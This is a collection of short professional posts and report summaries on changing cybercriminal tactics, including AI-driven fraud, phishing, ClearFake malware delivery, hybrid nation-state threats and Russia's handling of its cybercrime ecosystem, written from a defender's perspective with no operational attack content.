Understanding Cybercriminals' Evolving Tactics

UNODC: Emerging threats: The intersection of #criminal and #technological innovation in the use of automation and #artificial #intelligence in the cybercrime landscape of Southeast Asia Cybercrime has rapidly evolved from isolated acts by individual hackers to large-scale operations orchestrated by organized criminal groups. In this transformation, automation has emerged as a critical enabler, allowing threat actors to scale their activities, target victims across borders, and replicate attacks with minimal manual input. In Southeast Asia, this shift is particularly visible, as the region has become a hotspot for cyber-enabled criminality where traditional forms of crime such as fraud, extortion, and trafficking-in-persons are increasingly facilitated by automated tools and digital infrastructure. These dynamics are now extending into the Pacific, where accelerated digital adoption, limited regulatory capacity, and emerging online financial ecosystems present new opportunities for exploitation. This expansion underscores how criminal networks are leveraging technological innovation to widen their geographic footprint and entrench illicit operations across both Southeast Asia and the Pacific. The brief documents how AI-powered deepfakes, voice cloning and synthetic identities are increasingly exploited to perpetrate large-scale fraud, while automated tools are driving phishing, malware distribution and illicit financial flows. Scam compounds are integrating AI into their operations, combining multilingual chatbots, automated outreach and coerced labour to target victims worldwide. Bots are also being deployed to establish mule accounts, circumvent verification processes and channel illicit proceeds through cryptocurrency. The analysis underlines that the use of automation and AI is not limited to financial crime. Recent cases highlight the role of these technologies in online child sexual exploitation, sextortion, disinformation campaigns and identity fraud. Such developments illustrate the accelerating convergence between organized crime and technological innovation, and the growing challenges facing law enforcement and regulators in the region. In addition to mapping emerging risks, the brief provides recommendations for Member States and partners. These include strengthening legal and regulatory frameworks, equipping enforcement agencies with advanced investigative tools, developing safeguards against the misuse of new technologies, and enhancing regional cooperation. The brief also emphasizes the importance of awareness-raising, digital literacy and resilience measures to reduce victimization and build public confidence in digital environments.

Over the past 5 years, cybersecurity has evolved a lot, Here’s a breakdown of how the threat landscape has shifted—and yes, some of it is darkly amusing: 1. "Shift Left As organizations adopt the "shift-left" security mindset—catching issues early in the development process—attackers are evolving too. They’re not just watching from the sidelines; they’re learning the playbook and staying one step ahead. 2. "The Decline of the Classics" Traditional vulnerabilities like SQL injection, DoS, MITM, and spoofing are no longer the headline acts. Design improvements have made them harder to exploit. But don’t pop the champagne yet; new challenges are waiting in the wings. 3. "Logic, Leaks, and Loopholes" Business logic flaws, exposed PII, leaked secrets, supply chain compromises, and employee credential dumps are now the front line. These aren’t just technical issues—they're strategic vulnerabilities. It’s a reminder that while systems are secure by design, humans often aren’t. 4. "Attackers Go Global, Detection Goes Local" With AI and compute power, attackers can distribute operations across countless IPs, regions, and resources. This makes detection and response, particularly in bot management and WAF contexts, a true headache. Imagine chasing a burglar who splits into a thousand tiny burglars—across time zones. 5. "AI Powered Attacks" While guardrails are improving, attackers are pivoting to the weakest link: "PEOPLE". AI-powered social engineering campaigns are their new favorite tool. Who needs to hack a system when you can just convince someone to hand over the keys? 6. "Malware as a Service? Welcome to the Cyber SaaS Era" Malicious actors are embracing SaaS, leveraging legitimate platforms like Cloudflare to host their operations. Yes, they’ve gone corporate, and they’re really good at collaboration. Aggregating and identifying their infrastructure as malicious has become a serious challenge. Frankly, they’d make excellent startup founders—if only their "product" wasn’t chaos. The game has changed, and so must our approach. Cybersecurity is no longer just about patching code or stopping an attack—it’s about outthinking adversaries who are more resourceful, creative, and global than ever before What trends have you noticed in the last few years? #securitytrends #cloudsecurity #cloud #AIsecurity #LLMs

🚨 Attackers Get Smarter: Brute-Force, Phishing, and Exploits Surge ReliaQuest’s latest threat intel shows attackers aren’t slowing down—they’re evolving. Between Dec 2024 and Feb 2025, brute-force attacks on VPNs, RDP, and VDI shot up 21.3%, with actors scanning the internet for weak points in your remote access. 💥What’s Heating Up: RDP access exploited: One customer’s Windows Admin account was brute-forced via exposed RDP. The attacker dropped “System Informer” and went hunting with PSExec—caught just in time. MSHTA on the rise: Abuse of this native Windows binary jumped nearly 8%, driven by “ClearFake”—a sneaky CAPTCHA scam that tricks users into running malicious code in Run prompts. Internal phishing gets an upgrade: PhaaS kits like “Sneaky 2FA” bypass MFA using adversary-in-the-middle tactics and fake Microsoft login pages. ClearFake's growing grip: The rise in ClickFix tactics is amplifying ClearFake’s reach. This technique tricks users into pasting malicious commands into PowerShell or Run prompts, evading browser and antivirus defenses.  Lumma steals the show: Expect more MaaS offerings like Lumma info-stealing malware to flood the dark web soon. ClearFake delivers Lumma featuring the copy-and-paste trick to bypass browser protections and steal sensitive data from victims. CL0P ransomware gang reigns supreme: After weaponizing a flaw in Cleo Harmony, CL0P wreaked havoc on the retail industry. Meanwhile, infighting in groups like Black Basta is pushing hacking gangs to start their own operations, shifting toward exfiltration-only attacks. 🎯 Why It Matters:  Attackers are getting smarter, exploiting weak spots, and jumping on every opportunity to profit. Tactics like MSHTA abuse and exfiltration-only ransomware are on the rise, while access brokers are booming, with VPN listings surging 250% and prices up 46%. Cheaper exploits mean mass breaches are becoming more common. The threat is real, and it’s growing. 🛡 Stay Proactive Rely on Sigma rules from SOC Prime Platform to fortify your defenses against ever-adapting threats. All detection rules can be used across multiple SIEM, EDR, and Data Lake solutions and are mapped to MITRE ATT&CK®. Dive deep into full context with resources like CTI links, attack timelines, triage recommendations, and more actionable metadata. ❗️Disclaimer The GIF is recorded with Uncoder AI, a private IDE & AI co-pilot for threat-informed detection engineering. Uncoder helps over 5000 people to enable fast IOC sweeps with automated IOC-based query generation, seamlessly convert Sigma rules into 44 SIEM, EDR, and Data Lake languages, or perform instant cross-platform translation across 11 language formats. Uncoder AI is also your powerful assistant for automated CTI enrichment, ATT&CK tagging, and rule verification. References: Source: https://lnkd.in/dEKX9PBx Sigma Rules: https://lnkd.in/dQR2x5hb

cybercriminals are now weaponizing AI to create more effective and scalable cyberattacks In the past, a phishing campaign required effort. Attackers had to: 1. Collect data – Find victims’ names and emails. 2. Write individualized messages – Manually craft emails, often struggling with language and personalization. 3. Scale their attack – Repeat this process for thousands of targets, making mass phishing time consuming and inefficient. Enter Generative AI. Now, cybercriminals can automate highly personalized spear-phishing campaigns at scale with flawless language, tailored messaging, and near-instant execution. Instead of struggling with individual emails, they can generate thousands of convincing, targeted attacks in seconds. Why This Matters for Cybersecurity Leaders: -Attacks are becoming more convincing: AI improves phishing email quality, making them harder to detect. -Scalability is no longer a limitation: Threat actors can now launch thousands of highly personalized attacks at once. -Organizations must step up defenses: Advanced email security, AI-driven threat detection, and continuous employee awareness are more critical than ever. Generative AI isn’t just changing how businesses operate, it’s evolving the cyber threat landscape. Security teams must adapt just as quickly to stay ahead.

The line between cybercriminals and nation-state hackers has officially disappeared. And most logistics firms (or really most companies in general) have no idea what that means for them. Caption: For most of my career, 20 years with the FBI and another six in the private sector, the rules were mostly clear. Cybercriminals wanted money. Nation-states wanted intelligence. Different motives. Different methods. Different targets. That world no longer exists. What we're seeing now is a hybrid threat model that should alarm every executive regardless of your geographical location: 🔴 Nation-states are outsourcing operations to criminal groups and giving them state-level tools, zero-day exploits, and operational cover. 🔴 Criminal gangs are selling access to compromised networks to state-sponsored actors looking for geopolitical leverage. 🔴 Ransomware crews are doubling as espionage assets, extracting data for intelligence services BEFORE encrypting your systems for profit. This isn't theory. This is happening right now. Groups linked to Russia, China, and North Korea are actively blending with cybercriminal ecosystems. The result? Attacks that carry the sophistication of a government operation with the ruthless financial motivation of organised crime. Why should execurtives and senior leaders care? ("We've never had a breach, why should I care?!") Because you sit at the intersection of everything these hybrid actors want: 🟠 Real-time movement data across borders 🟠 Customs and trade documentation 🟠 Access to defence and critical infrastructure supply chains 🟠 Financial transaction flows between dozens of partners Your network isn't just a business asset. It's an intelligence goldmine. And here's the problem, most companies are still defending against yesterday's threat. A lone hacker in a hoodie. A generic phishing email. A script kiddie poking at your firewall. The adversary has evolved. Your security posture has to evolve with it. This hybrid model demands hybrid defence: ✅ Threat intelligence that goes beyond vendor dashboards, understanding WHO is targeting your sector and WHY ✅ Board-level awareness that treats cyber threats as geopolitical risks, not just IT tickets ✅ Supply chain vetting that accounts for state-sponsored infiltration, not just financial stability ✅ Incident response plans built for attacks that are designed to persist, not just disrupt Because when a criminal gang has a nation-state standing behind it, your antivirus subscription isn't going to do much. Is your organisation still defending against yesterday's threat actor, or have you adapted to the hybrid reality? I'd like to hear how your industry is responding. Drop your perspective below or send me a message directly if you have questions or would like to discuss specific threats to your business. I'm just here to help.

We have spent the last decade teaching individuals to avoid clicking on suspicious links. Now, we face a new challenge: teaching them to be cautious about connections. This shift is significant. Historically, the phishing playbook was straightforward: get someone to click a harmful link, open a malicious attachment, or share their credentials. However, the tactics are evolving. Instead of requesting a click, attackers may ask for seemingly reasonable actions: - Connect this inbox assistant. - Add this skill. - Install this connector. - Grant this tool access to your calendar, email, Slack, or CRM. This evolution is what makes the current landscape feel different. The new lure is not fear; it’s productivity. Attackers present software that appears helpful, promising speed, automation, and reduced manual work. While some of these tools may indeed deliver on their promises, normalizing the mindset of “just connect it” introduces a new trust issue. The next phishing campaign may not request your password; it may seek permissions. From the perspective of security teams, particularly at IRONSCALES, this is where many may find themselves unprepared. The focus has primarily been on identifying suspicious messages, but we must shift our attention to suspicious access, connectors, and automation. Attackers can bypass your email security if they successfully convince someone to grant access to a tool that seems legitimate. This represents a fundamentally different kind of phishing problem.

The Rise of Hacker Micro-Markets Cybercriminals are shifting tactics—rather than relying on large underground marketplaces, they’re creating micro-markets to sell stolen data directly. These hackers use multiple personas to promote their sites, leveraging social media tactics to attract buyers and build trust. Here's an actor sharing a free CashApp method on a scammer’s Telegram channel. The real goal? To advertise their logs platform, hackersworld[.]shop. By sharing hacking techniques and showcasing their 'expertise,' the scammer builds trust and credibility—ultimately driving traffic to their marketplace. This tactic mirrors legitimate marketing strategies, especially in social media, where value-driven content is used to attract and convert customers. The cybercrime landscape continues to evolve, adopting methods we see in everyday business. By analyzing the hackersworld website, we identified 66 different domains with similar themes, some dating back as far as five years. This highlights their persistence and long-term operation. IOCs: https://lnkd.in/ebgcGjPJ As cybercriminals adopt marketing strategies similar to legitimate businesses, how can we stay ahead of these threats? Let’s discuss. 🚨

In this blog, Microsoft details how attackers are leveraging phishing campaigns, malicious infrastructure, and social engineering to infiltrate higher education institutions. Once inside, they manipulate payroll processes to reroute direct deposits, steal credentials, and establish persistence for future fraud. The investigation highlights the attackers’ evolving tactics, including the use of lookalike domains, cloud-based tools, and multi-stage credential harvesting designed to evade traditional defenses. The post also outlines key detection strategies, recommended mitigations, and security best practices that universities and other organizations can adopt to defend against these financially motivated campaigns. This is a must-read for security leaders, IT administrators, and anyone responsible for safeguarding institutional finances and data. https://lnkd.in/eu43JHgP

🇷🇺 🗞️ How Russia selectively controls the impunity enjoyed by Cybercriminals: an enlightening report issued this week by INSIKT Group / Recorded Future, documenting how the Russian cyber-criminal ecosystem shifted from broad tolerance to managed control. 🔎 Research from May 2024–Sept 2025 using data from dark-web forums, leaked chats, public enforcement.. It sheds light on Operation Endgame, a multinational takedown effort from May 2024 & shows how it changed ground dynamics 🔹It targeted loaders, enablers, money-mules and infrastructure 🔹The actions signalled to the ecosystem: the cost-benefit calculus for operating from/within Russia has shifted; enforcement is not zero-risk. 🔹The selective pressure triggered changes in the underground: fragmentation, tighter vetting, paranoia, evolving ransomware TTPs, group rivalries, payment/target strategies 🔹The “politics of protection” = enforcement or lack thereof signals which actors are expendable and which are strategically useful. Take-aways 1️⃣ A managed market 🔹 🇷🇺cyber-criminal ecosystem has evolved from near-blanket tolerance toward selective State management: actors with little strategic value are targeted, those providing intelligence, geopolitical leverage & state utility are insulated. 🔹protection no longer depends on location. 🔹Direct, task-level coordination between cyber-criminal leadership and Russian intelligence. In addition, the“Dark Covenant” model (direct, indirect, tacit links) remains operative. 2️⃣ Underground ecosystem adapts 🔹Affiliates are less visible; open-call RaaS (ransomware-as-a-service) programs declined in public forums 🔹Operators have heightened vetting: deposits, KYC-lite checks, stricter inactivity rules. 🔹Business rules: some ransomware programs explicitly exclude nonprofits, healthcare, government entities; minimum ransom demands; anti-collision rules. These act as both reputational hedges and political boundary markers. 🔹Impersonator groups proliferate: façade ransomware groups or “scam” groups trying to ride brand equity = erodes trust & raises barriers to entry. 🔹Forum discussions show increased emphasis on OPSEC: moving to decentralized communication: burner phones, hidden volumes.. 3️⃣ Enforcement signals / “politics of protection” • Russian authorities have taken visible action against certain monetisation/enabler nodes (e.g., Cryptex, UAPS) • By contrast, core high-value ransomware groups (Conti, Trickbot) have avoided this= insulation via state-links. 4️⃣ Cyber-criminal groups are increasingly embedded in Russia’s geopolitical strategy 🔹 arrests, releases, negotiations align with diplomatic cycles, prisoner exchanges. 🔹Cyber-crime = a hybrid instrument of state influence, intelligence gathering, plausible deniability & leverage. ➡️ defenders should understand the state-criminal bargain 🔹Disruption strategies need to target also the enablers (cash-out, money-laundering, hosting) 📰 ☕️ enjoy the weekend read!

Navigating AI-Driven Cybercrime: What Every Business Needs to Know Here’s the deal: The rise of AI isn’t just transforming industries—it’s transforming cybercrime too. Staying secure in this new landscape means understanding just how AI is reshaping threats. Here are three critical insights to keep your business one step ahead: → AI is Empowering Cybercriminals From automated phishing to deepfake scams, cybercriminals are using AI to make their attacks faster, smarter, and more convincing. Traditional defenses alone won’t cut it. Staying informed about AI-driven threats is crucial. → Strengthen Your Cybersecurity Practices Don’t wait for an attack to hit. Implement robust measures—multi-factor authentication, regular updates, and AI-powered security tools that can detect suspicious activity in real time. Empower your employees with training to recognize phishing attempts and scams. → Use AI as a Defense Tool, Not Just a Threat AI can be your ally too. Leverage machine learning to spot patterns, monitor activity continuously, and respond automatically to threats. Shifting from a reactive to a proactive approach is key in today’s threat landscape. The takeaway? The AI-driven cyber threat landscape is here, and it’s only growing. Businesses that understand, prepare, and harness AI for defense will be best positioned to stay secure. Are you ready to strengthen your defenses? Let’s talk strategy.